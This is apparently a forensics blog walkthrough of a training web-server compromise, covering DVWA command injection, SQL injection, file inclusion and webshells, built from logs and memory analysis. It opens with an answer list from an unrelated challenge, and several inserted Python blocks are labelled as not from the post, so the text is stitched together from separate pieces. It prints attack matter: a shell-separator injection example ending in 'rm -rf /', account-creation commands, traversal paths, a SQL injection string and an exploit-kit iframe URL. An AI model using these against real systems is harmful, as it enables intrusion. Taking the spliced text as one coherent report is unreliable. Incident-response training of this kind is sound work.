  5. What time was the attacker account created in UTC (XX:XX:XX format)? Jun 1 20:11:03
  6. What port is the protocol used to compromise the system set on? 422
  7. How many different countries are represented by the IP's in the web server log? 6
  8. What date and time (directly copy/paste from log) did the attacker first log in? Jun 1 20:03:45
  9. What is the IP that failed to log in directly before the attacker successfully logged in? 107.150.94.4
  10. What day of the week does the attacker's cron job fire? Monday
  11. What is the name of the user account the attacker made? radvlad
  12. The attacker set a password for the account that they made, what is it set to? 1qaz2wsx
  13. The attacker changed the root password, what is it set to? asdzxc
  14. What addition to the website is causing users to get redirected to malicious pages? <iframe src="http://anecdote.roobaroo.org/xegblh2.html"></iframe>
  15. What exploit kit is the link associated with? Angler
  16. What is the sha256 hash of the first file the attacker added to /var/www/html? 94ebd2af4d1e1e4d01c4806cf1d94c44d24014da0703424f864e5e8cd3396fb9
  17. What is the ClamAV name for the second file the attacker added to /var/www/html? Win.Trojan.691128-1
  18. What file was exfiltrated? Secret-Recipe-Chili
  19. What command line tool did the attacker use to exfiltrate the file? pastebinit

Saturday, March 18, 2017

Ashemery.com: Challenge #1 - Web Server Case Write-up

I found this awesome collection of DFIR training scenarios on dfir.training (thanks to @DFIR_tools and Ali Hadi, Ph.D.): http://www.ashemery.com/dfir.html

Link to disk image.
Link to memory image.
Hashes.
Password for disk image.

Here's my write-up for Ali Hadi's "Web Server Case". This is a simple case but enjoyable because you can correlate disk artifacts and memory to build the picture of attacker activity. I'll write this up as I go so that anyone could follow along (note: this is more of a walkthrough than a report).

Ali provided 7 main questions to guide analysis:
  1. What type of attacks have been performed on the box?
  2. How many users has the attacker(s) added to the box, and how were they added?
  3. What leftovers (files, tools, info, etc) did the attacker(s) leave behind? (assume our team arrived in time and the attacker(s) couldn’t clean and cover their tracks)
  4. What software has been installed on the box, and were they installed by the attacker(s) or not?
  5. Using memory forensics, can you identify the type of shellcode used?
  6. What is the timeline analysis for all events that happened on the box?
  7. What is your hypothesis for the case, and what is your approach in solving it?

Gather System Information:
My first step was to get some contextual information on the system. I mounted the image using FTK Imager (make sure to always mount as "Filesystem / Read-only" to ensure your tools work as intended) and extracted the desired registry hives (SYSTEM, SOFTWARE, SAM, NTUSER.DAT, UsrClass.dat).

I used Eric Zimmerman's Registry Explorer and Harlan Carvey's RegRipper to get two different views of the System and Software hives. I often use both of these tools to verify against each other. I also prefer Registry Explorer for less structured analysis, and RegRipper for getting all the common answers I need on every case (Registry Explorer does this too with Bookmarks, but I like some of the auto-conversions in RegRipper and it's just a tool I'm comfortable with honestly).

Computer Name: WIN-L0ZZQ76PMUF

Time Zone: PDT (ActiveTimeBias of 420 minutes, i.e. UTC-7; the bias is the number of minutes you add to local time to get UTC)

OS Version: Windows Server 2008 Standard (from Software hive)


Users: Administrator [500], user1 [1005], hacker [1006] (lol, used RegRipper SAM profile)

Since this is a pretty obvious practice scenario created for a college course, the instructor gives us easily spotted pivot points. The "Account Created" times for the "user1" and "hacker" accounts are the first critical items we can add to our timeline and pivot from.

Get Organized:
It always pays dividends when I take a few minutes to group my analytic questions to answer, write down what artifacts I expect to need to answer each question, and also write down any unknowns that I don't currently have a plan for but need to be answered.

In this case we don't have much context other than: This is a web server. It has been hacked via a web service. The attacker has added some accounts. Other than these clues we have to figure it out ourselves, which puts extra emphasis on vetting out legitimate vs attacker activity.
  • What types of attacks have been performed on the box? Expected to use web server logs, file system timeline, memory analysis (especially if web logs lack parameters which we can potentially fill in with memory).
  • How many users did the attacker add? (hypothesis == 2 based upon SAM) and how were they added? To figure out how they were added we'll need to find the actual commands run, this might be in the web logs depending on the vulnerability exploited or in memory.
  • What leftovers (files, tools, info, etc) did the attacker(s) leave behind? This sounds like a filesystem timeline ($MFT, $LogFile, $UsnJrnl:$J) task if I've ever heard one. 
The first necessary step in answering this question is determining the web server software installed. In this case XAMPP is installed. Finding the version of the web server software running is pretty simple, here are a few ways:

  • Via Disk: right in the root of the drive you see a xampp folder, suggesting the XAMPP Apache/MySQL/PHP stack is installed.
  • Via Memory:

Netscan shows httpd.exe (Apache) is running and listening on 80/443.

PS C:\Users\aswood\Desktop\tools\Forensics\Memory Forensics\volatility_2.6_win64_standalone> .\volatility_2.6_win64_standalone.exe -f C:\Users\aswood\Desktop\Cases\Challenge1_WebServerCase\memdump\memdump.mem --profile=Win2008SP2x86 netscan

Pslist (or psscan/psxview) shows that Mysqld.exe, httpd.exe, and xampp-control.exe are running.

PS C:\Users\aswood\Desktop\tools\Forensics\Memory Forensics\volatility_2.6_win64_standalone> .\volatility_2.6_win64_standalone.exe -f C:\Users\aswood\Desktop\Cases\Challenge1_WebServerCase\memdump\memdump.mem --profile=Win2008SP2x86 pslist

XAMPP is a prepackaged LAMP stack which has packages for Windows, Linux and OSX. It's really focused on ease of use and setup, which often leads to default and insecure configurations being used in production. We still have the image mounted as E:\ drive so viewing the logs is as simple as accessing "E:\[root]\xampp\apache\logs".
As with any Apache install, the access.log is the key artifact that will show us what requests were made to the server. In this case it's really simple to start finding answers to our questions using the time period of the account creation (Sept 2 2015 ~0900 UTC) and the account names (hacker, user1) as a pivot point.

A simple search through the access.log for the minute of the account creation has interesting results:

We see a series of POSTs to "/dvwa/vulnerabilities/exec" with a 200 response. DVWA is "Damn Vulnerable Web App", a common teaching tool for basic web application pen-testing (fun if you've never worked through it, highly recommended, as is most of what is on VulnHub). Here's what the "vulnerabilities/exec/" page looks like in DVWA:


Essentially it's an insecure web front-end for the ping command. The page doesn't perform any input validation, so anyone can terminate the ping command with a shell separator and run another command. Example: "192.168.0.1; rm -rf /" ("ouch" says the Linux server running apache2 as root!)
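As an added illustration of the missing check (my own Python, not DVWA's PHP and not code from the post), this is the shape of a ping front-end that does not hand the user's value to a shell: the target must parse as an IP address or a plain hostname, and ping is invoked with an argv list so there is no shell to interpret ";" or "&&". The hostname grammar and the count flag handling are my assumptions.

```python
import ipaddress
import platform
import re
import subprocess
from typing import List

# Conservative RFC 1123 hostname grammar (labels of letters, digits and inner hyphens).
# Assumption: anything that is not an IP literal or such a hostname is rejected.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def validate_target(target: str) -> str:
    """Return a normalised target, or raise ValueError for anything that is not an IP or hostname.

    This allow-list is exactly what the DVWA exec page lacks: with no check, a value such as
    '192.168.0.1; rm -rf /' or '192.168.56.102 && net user ...' rides straight into the shell.
    """
    t = target.strip()
    try:
        return str(ipaddress.ip_address(t))  # accepts IPv4 and IPv6 literals
    except ValueError:
        pass
    if _HOSTNAME_RE.match(t):
        return t
    raise ValueError(f"rejected ping target: {target!r}")


def is_valid_target(target: str) -> bool:
    """Boolean form of validate_target, convenient for filtering submitted values."""
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def build_ping_argv(target: str, count: int = 3) -> List[str]:
    """Build ping's command line as an argv list; no shell ever parses the target.

    Windows ping takes -n for the packet count, Unix ping takes -c (assumed platforms only).
    """
    host = validate_target(target)
    count_flag = "-n" if platform.system() == "Windows" else "-c"
    return ["ping", count_flag, str(int(count)), host]


def ping_safe(target: str, count: int = 3) -> subprocess.CompletedProcess:
    """Run ping for an already-validated target without shell=True."""
    return subprocess.run(build_ping_argv(target, count), capture_output=True, text=True, timeout=30)


if __name__ == "__main__":
    # Constructed inputs: the post's example plus the pattern seen in the memory strings.
    for candidate in ["192.168.56.102", "192.168.0.1; rm -rf /",
                      "192.168.56.102 && net user hacker hacker /add"]:
        print(f"{candidate!r:55} valid={is_valid_target(candidate)}")
```

The separator characters are never searched for by name; the allow-list rejects anything that is not a valid address, which also covers back-ticks, `$(...)`, newlines and whatever encoding the client used.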


Creating Filesystem Timeline:

There are many tools that can create a functional filesystem timeline. Here are some options:
  • Absolute Fastest/Laziest MFT based: FTK Imager can create a "Directory Listing" which contains MAC times (right click in the evidence tree, select "Export Directory Listing").
  • Sleuthkit FLS & Mactime can be used to create a filesystem timeline in NTFS.
  • Log2timeline/Plaso can be used to create a filesystem timeline.
  • A simple MFT parsing tool like RedWolf MFT_Parser or AnalyzeMFT.py
I opted for something a little overkill and cool by using David Cowen's Triforce (ANJP 3.11.07 free edition) tool. It doesn't hurt that Zelda just came out. This tool accepts not just the $MFT but also the $J and $LogFile, putting pretty much all the filesystem metadata available on disk in your hands to interpret. Parse these files using ANJP, connect to the database, and finally export any filtered views you need to review to text or XLSX.

What are the first two "Deleted" records reported from the USN Journal? How about two artifacts of php shells dropped via SQL injection? #mastersword


Creating Volatility Compatible Memory Strings file:

You can simply run strings against a memory dump and use command line tools to find items of interest. This is the oldest form of memory forensics and is still very useful. Volatility takes that technique to another level by telling you which process's address space the string appears in! This can be done in (at least) two different ways. One simple way I've used many times is the Volatility "yarascan" module: with --yara-rules "mystring" you can search for one string (or for a YARA rule full of strings with the --yara-file switch) and find which process it resides within.

To do this at scale - you can use the Volatility strings module which requires an input file of the strings preceded with their decimal offset within the memory dump. Strings.exe from Sysinternals can produce this output with a command similar to the below:


After this is created you can run this output file through Volatility with the "strings" module to produce another file with the process mapping for every string! This is a technique I don't generally use, so I was excited to put it to work after reading about it in the crucial tome "Art of Memory Forensics" (highly recommended if you don't own it - enjoy it over the course of several months IMO :-) ).
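As an added example (my own Python, not the post's command and not a Sysinternals tool), here is a small extractor that writes the "decimal offset:string" lines the post describes as the input for the Volatility "strings" module, covering both ASCII and UTF-16LE strings the way a Windows-oriented strings tool does. The minimum length of 4 and the constructed sample buffer are my assumptions.

```python
import mmap
import re
import sys
from typing import Iterator, List, Tuple

# Minimum printable run that counts as a string (assumed; most strings tools default to 4).
MIN_LEN = 4


def extract_strings(data: bytes, min_len: int = MIN_LEN) -> Iterator[Tuple[int, str]]:
    """Yield (decimal_offset, text) for every ASCII and UTF-16LE string in a bytes-like buffer."""
    # Printable ASCII 0x20-0x7E plus tab, min_len or more in a row.
    ascii_re = re.compile(rb"[\x20-\x7e\t]{%d,}" % min_len)
    # UTF-16LE: the same byte range with a NUL after each character (how Windows stores wide strings).
    utf16_re = re.compile(rb"(?:[\x20-\x7e\t]\x00){%d,}" % min_len)
    hits = [(m.start(), m.group().decode("ascii")) for m in ascii_re.finditer(data)]
    hits += [(m.start(), m.group().decode("utf-16-le")) for m in utf16_re.finditer(data)]
    # Volatility does not care about order, but sorted output diffs and greps more cleanly.
    for offset, text in sorted(hits):
        yield offset, text


def to_volatility_lines(data: bytes, min_len: int = MIN_LEN) -> List[str]:
    """Format hits as 'offset:string' lines, offset in decimal, one string per line."""
    return [f"{offset}:{text}" for offset, text in extract_strings(data, min_len)]


# Constructed sample: 100 bytes of padding, an ASCII command fragment like the one recovered
# from httpd.exe memory in the post, more padding, then a UTF-16LE string.
SAMPLE = (
    b"\x00" * 100
    + b"ping 192.168.56.102 %26%26 net user hacker hacker /add"
    + b"\x00" * 10
    + "cmd.exe".encode("utf-16-le")
    + b"\x00\x00"
)


def main(path: str) -> None:
    """Stream a memory image through mmap so a multi-GB dump is not read into RAM at once."""
    with open(path, "rb") as fh, mmap.mmap(fh.fileno(), 0, access=mmap.ACCESS_READ) as mm:
        for offset, text in extract_strings(mm):
            sys.stdout.write(f"{offset}:{text}\n")


if __name__ == "__main__":
    if len(sys.argv) == 2:
        main(sys.argv[1])
    else:
        print("\n".join(to_volatility_lines(SAMPLE)))
```

Redirect the output to a file and feed it to Volatility's strings module with its -s switch; the offsets are file offsets into the dump, which is what that module maps back to processes.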

Attack: Command Injection
This leads us to the first attack against this box - command injection. Looking at our access.log for the POSTs to "dvwa/vulnerabilities/exec/" shows that we do not have the parameters supplied to the web server (Apache logs the request line, not the POST body). As far as I know there isn't an on-disk artifact in this case which shows the commands run to create the accounts, so we need to pivot to memory.

Using Volatility (I'm using the 2.6 standalone Windows version from here) the first commands that come to mind are "consoles" and "cmdscan". Essentially consoles is the newer plugin and will show us both the command and its result.

PS C:\Users\aswood\Desktop\tools\Forensics\Memory Forensics\volatility_2.6_win64_standalone> .\volatility_2.6_win64_standalone.exe -f C:\Users\aswood\Desktop\Cases\Challenge1_WebServerCase\memdump\memdump.mem --profile=Win2008SP2x86 consoles
The "consoles" module shows us the commands run to create the "user1" account, add it to the "Remote Desktop Users" local group, and enable RDP in the Windows firewall. Note that at this time we don't have confirmation that the "user1" account was added via the DVWA command execution vulnerability, it's simply a hypothesis.

Well that's great - but what about the "hacker" account? It's not in the consoles display like the creation of "user1". We know the command execution vulnerability is being served up by the httpd.exe process, so let's dump the memory space from that process (or processes) and string search it.

To do this I used the "memdump" module in Volatility as below to dump the process space of the two httpd.exe processes to my Artifacts directory.


After you've dumped the process space, you can simply string search the files. I created text files of all strings with the Sysinternals strings program. After you've created your lists of strings you can simply search them using Select-String or Grep.


Alright! At the bottom we see the "net user hacker hacker /add" and "net localgroup "Remote Desktop Users" hacker /add" commands. Take note of the %26%26 before the commands - this shows that the attacker was submitting a ping request through the DVWA web app for 192.168.56.102 (their own IP) and then typing && (%26%26 in URI encoding) to break out of the ping command and run additional commands. Interestingly we do not have the same results for the "user1" account, which was added just 19 seconds before the "hacker" account. This leads me to hypothesize that these two accounts were added in different ways.

That last discovery gives us another pivot (cue Zelda sound)! "%26%26" (&&) can serve as a relatively unique pattern representing commands run via the DVWA command injection vulnerability.

Using this pivot we do see some additional recon activity (directory listings of the "Windows" and "Users\Administrator" directories) but not much else. It definitely appears this exploitation was primarily used as an example and to create the "hacker" account.

Attack: SQL Injection

Using the access.log we can observe the SQLmap SQL injection ("SQLi") tool's default user agent string and fairly obvious SQLi behavior starting at 11:15:40. Because these attacks were run against the "/dvwa/vulnerabilities/sqli" page it did not take long for the SQLi attack to gain a shell.

SQLmap writing a simple shell to disk:

At 11:25:53 two files are dropped on the box, "tmpbiwuc.php" and "tmpukudk.php". Within the same second we see a GET request for "tmpbiwuc.php" intended to run the command "echo command execution test". At 11:26:23 the "tmpukudk.php" file was deleted by a command issued through the SQLmap-created shell.

On 9/3/15 @ 6:52:24 another SQLi attack succeeds and new PHP shells are dropped, "tmpudvfh.php" and "tmpbrjvl.php". Once again the initial file "tmpudvfh.php" is deleted via a subsequent command. I have been on the serving end of SQLmap many times in the past, but relatively few times on the receiving end of an attacker getting a command shell directly through SQLmap. I hypothesize this is normal behavior for SQLmap: create an initial dropper, create a more fully featured shell, then delete the dropper, but I haven't verified this.


Attack: Local File Inclusion

There are obvious indicators of local file inclusion in the access.log. The attacker appears to utilize an LFI vulnerability in "/dvwa/vulnerabilities/fi/" to read multiple sensitive files on disk and to read files which the attacker themselves wrote to disk via other methods. Reading an attacker-written local file is the bridge between an RFI ("Remote File Inclusion") and LFI, and usually allows command execution.

1. Attacker uses LFI to read the Windows hosts file.
2. Attacker uses LFI to read "data.txt" which contains "Hello". Appears to be a test file.
3. Attacker uses LFI to read PHPmyadmin configuration.
4. Attacker uses LFI to read abc.txt, an attacker-created file with potential code execution.
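The pivots used in the command injection, SQL injection and LFI sections above all come down to reading access.log with a few patterns in mind: a time window around the account creation, the "%26%26" (&&) separator, sqlmap's user agent, "' or 1=1" style payloads, "../" traversal in the fi/ page parameter, requests to the tmpXXXXX.php stagers, and hits on c99.php/phpshell.php. As an added example (my own Python, not from the post), here is a small triage script over Apache combined-format log lines; the sample lines are constructed to resemble the entries quoted in the post (sizes, the c99.php path and the benign first line are my assumptions).

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List, Optional
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" log format, which is what XAMPP's access.log uses by default.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
SQLI_RE = re.compile(r"'\s*(?:or|and)\s+\d+\s*=\s*\d+", re.IGNORECASE)   # a' or 1=1
METACHAR_RE = re.compile(r"&&|\|\||[;|`]|\$\(")                         # && after URL decoding
SQLMAP_STAGER_RE = re.compile(r"^/tmp[a-z]{5}\.php$")                   # tmpbiwuc.php and friends
KNOWN_SHELLS = {"c99.php", "phpshell.php", "phpshell2.php"}

# Constructed sample lines modelled on the post's timeline (not copied from the real log).
SAMPLE_LOG = [
    '192.168.56.1 - - [02/Sep/2015:07:05:10 +0000] "GET /dvwa/index.php HTTP/1.1" 200 2150 "-" "Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0"',
    '192.168.56.102 - - [02/Sep/2015:09:04:35 +0000] "POST /dvwa/vulnerabilities/exec/ HTTP/1.1" 200 4951 "http://192.168.56.101/dvwa/vulnerabilities/exec/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"',
    '192.168.56.102 - - [02/Sep/2015:09:33:23 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../users/administrator/data.txt HTTP/1.1" 200 5 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"',
    '192.168.56.102 - - [02/Sep/2015:10:49:53 +0000] "GET /dvwa/vulnerabilities/sqli/?id=a%27+or+1%3D1&Submit=Submit HTTP/1.1" 200 159 "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"',
    '192.168.56.102 - - [02/Sep/2015:11:15:40 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 302 1 "-" "sqlmap/1.0-dev-nongit-20150902 (http://sqlmap.org)"',
    '192.168.56.102 - - [02/Sep/2015:11:25:53 +0000] "GET /tmpbiwuc.php?cmd=echo%20command%20execution%20test HTTP/1.1" 200 23 "-" "sqlmap/1.0-dev-nongit-20150902 (http://sqlmap.org)"',
    '192.168.56.102 - - [03/Sep/2015:07:19:32 +0000] "GET /dvwa/webshells/c99.php HTTP/1.1" 200 80512 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"',
]


def parse_line(line: str) -> Optional[Dict]:
    """Parse one combined-format line; the query string is URL-decoded so %26%26 becomes &&."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    e = m.groupdict()
    e["time"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(e["uri"])
    e["path"] = parts.path
    e["query"] = unquote_plus(parts.query)
    e["status"] = int(e["status"])
    e["ua"] = e["ua"] or ""
    return e


def triage(e: Dict) -> List[str]:
    """Return the indicator tags an entry matches; an empty list means nothing stood out."""
    tags: List[str] = []
    if e["method"] == "POST" and e["path"].startswith("/dvwa/vulnerabilities/exec"):
        tags.append("cmd-injection-endpoint")   # body not logged: correlate with memory strings
    if "sqlmap" in e["ua"].lower():
        tags.append("sqlmap-ua")
    if SQLI_RE.search(e["query"]):
        tags.append("sqli-pattern")
    if "../" in e["query"] or "..\\" in e["query"]:
        tags.append("lfi-traversal")
    if SQLMAP_STAGER_RE.match(e["path"]) and "cmd=" in e["query"]:
        tags.append("sqlmap-stager")
    if e["path"].rsplit("/", 1)[-1].lower() in KNOWN_SHELLS:
        tags.append("known-webshell")
    if METACHAR_RE.search(e["query"]):
        tags.append("shell-metachar")
    return tags


def pivot_window(entries: List[Dict], center_iso: str, seconds: int = 60) -> List[Dict]:
    """Entries within +/- seconds of an ISO-8601 timestamp, e.g. the SAM account creation time."""
    center = datetime.fromisoformat(center_iso)
    lo, hi = center - timedelta(seconds=seconds), center + timedelta(seconds=seconds)
    return [e for e in entries if lo <= e["time"] <= hi]


if __name__ == "__main__":
    entries = [e for e in map(parse_line, SAMPLE_LOG) if e]
    for e in entries:
        print(e["time"].isoformat(), e["ip"], e["method"], e["path"], triage(e))
    print("around user1 creation:", [e["path"] for e in pivot_window(entries, "2015-09-02T09:05:06+00:00")])
```

Two caveats match the post's own findings: the exec POSTs carry no parameters in the log, so the "cmd-injection-endpoint" tag is only a time correlation until the memory strings confirm it, and a lone ";" or "|" can be legitimate in some applications' query strings, so "shell-metachar" is a lead to review rather than a verdict.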

Attacker Tools: Webshells

On 9/3/2015 at 7:14:48 a file "webshells.zip" is created in the "DVWA" folder. This archive contains the infamous C99 webshell, as well as a very basic PHP shell that simply accepts a shell command as a parameter.

The basic "phpshell.php" (and its "phpshell2.php" duplicate) were used several times, notably to create the "abc" folder:

Times that commands were submitted via the C99 shell (found using access.log):

Timeline:
Time (UTC) | Event | Source | Notes
9/2/2015 7:10:41 | First web requests from 192.168.56.102 with user agent suggesting a potential Kali Linux / Iceweasel browser | access.log | Fast requests - potential spidering or directory brute force (dirb?). "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.0" (I don't think many people install Iceweasel, it's installed in Kali so that's probably what was used.)
9/2/2015 8:34:27 | 192.168.56.102 switches to UA "Mozilla/4.0 (compatible; MSIE 6.0;)" suggesting a potential change in tool used | access.log |
9/2/2015 8:35:47 | 192.168.56.102 switches to UA "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)" suggesting a potential change in tool used | access.log |
9/2/2015 9:04:35 | HTTP POSTs to /dvwa/vulnerabilities/exec | access.log | Time correlation to creation of user1 && hacker accounts. Hypothesis - attacker used command injection vulnerability to create these accounts
(assumed proximity BEFORE account creation) | net user user1 Root@psut /add | Memory strings | Run via apparent command injection vuln
(assumed proximity BEFORE account creation) | net localgroup "Remote Desktop Users" user1 /add | Memory (found with Vol "consoles" plugin) | Run via apparent command injection vuln
9/2/2015 9:05:06 | user1 account created | SAM hive | Initial pivot
(assumed proximity BEFORE account creation) | net user hacker hacker /add | Memory strings | Run via apparent command injection vuln
(assumed proximity BEFORE account creation) | net localgroup "Remote Desktop Users" hacker /add | Memory strings | Run via apparent command injection vuln
9/2/2015 9:05:25 | hacker account created | SAM hive | Initial pivot
9/2/2015 9:31:16 | First LFI activity observed - accessing hosts file | access.log | Hypothesis - attacker accessed hosts file to confirm they have LFI access
9/2/2015 9:33:23 | "GET /dvwa/vulnerabilities/fi/?page=../../../../../../users/administrator/data.txt HTTP/1.1" 200 | access.log | Attacker accesses data.txt which simply says "hello" inside. Hypothesis - attacker created this file with command injection vuln, and accessed it via LFI to verify file write capability and access via LFI.
9/2/2015 9:34:52 | LFI activity observed accessing phpmyadmin configuration. | php_error_log && access.log | PHP Warning: include(../../../../../../xampp/phpmyadmin/config.inc): failed to open stream: No such file or directory in C:\xampp\htdocs\DVWA\vulnerabilities\fi\index.php on line 35
9/2/2015 9:42:11 | "POST /dvwa/vulnerabilities/exec/ HTTP/1.1" 200 4951 "http://192.168.56.101/dvwa/vulnerabilities/exec/" | access.log | Hypothesis - attacker wrote abc.txt using command injection vuln.
9/2/2015 9:42:21 | "GET /dvwa/vulnerabilities/fi/?page=../../../../../../../../abc.txt HTTP/1.1" 200 | access.log | Hypothesis - attacker used abc.txt
9/2/2015 10:49:53 | "GET /dvwa/vulnerabilities/sqli/?id=a%27+or+1%3D1&Submit=Submit HTTP/1.1" 200 159 "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" | access.log | SQLi activity
9/2/2015 11:15:40 | "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 302 1 "-" "sqlmap/1.0-dev-nongit-20150902 (http://sqlmap.org)" | access.log | SQLmap attack tool run by attacker, evidenced by UA string and accompanying SQLi attempts.
9/2/2015 11:25:53 | tmpbiwuc.php created time | MFT | Potential malicious PHP webshell
9/2/2015 11:25:52 | tmpukudk.php created time | MFT | Potential malicious PHP webshell
9/2/2015 11:25:53 | "GET /tmpbiwuc.php?cmd=echo%20command%20execution%20test HTTP/1.1" | access.log | Command execution test of the tmpbiwuc.php file which was dropped by SQLmap.
9/3/2015 7:14:48 | \xampp\htdocs\DVWA\webshells.zip created | MFT | PHP webshells - C99 and a simple 1-liner PHP command shell
9/3/2015 7:16:03 | phpshell.php accessed | php_error_log |
9/3/2015 7:19:32 | c99.php accessed | php_error_log |
9/3/2015 7:21:28 | c99 shell used to execute 4 commands | access.log | Shows attacker persistence using webshell.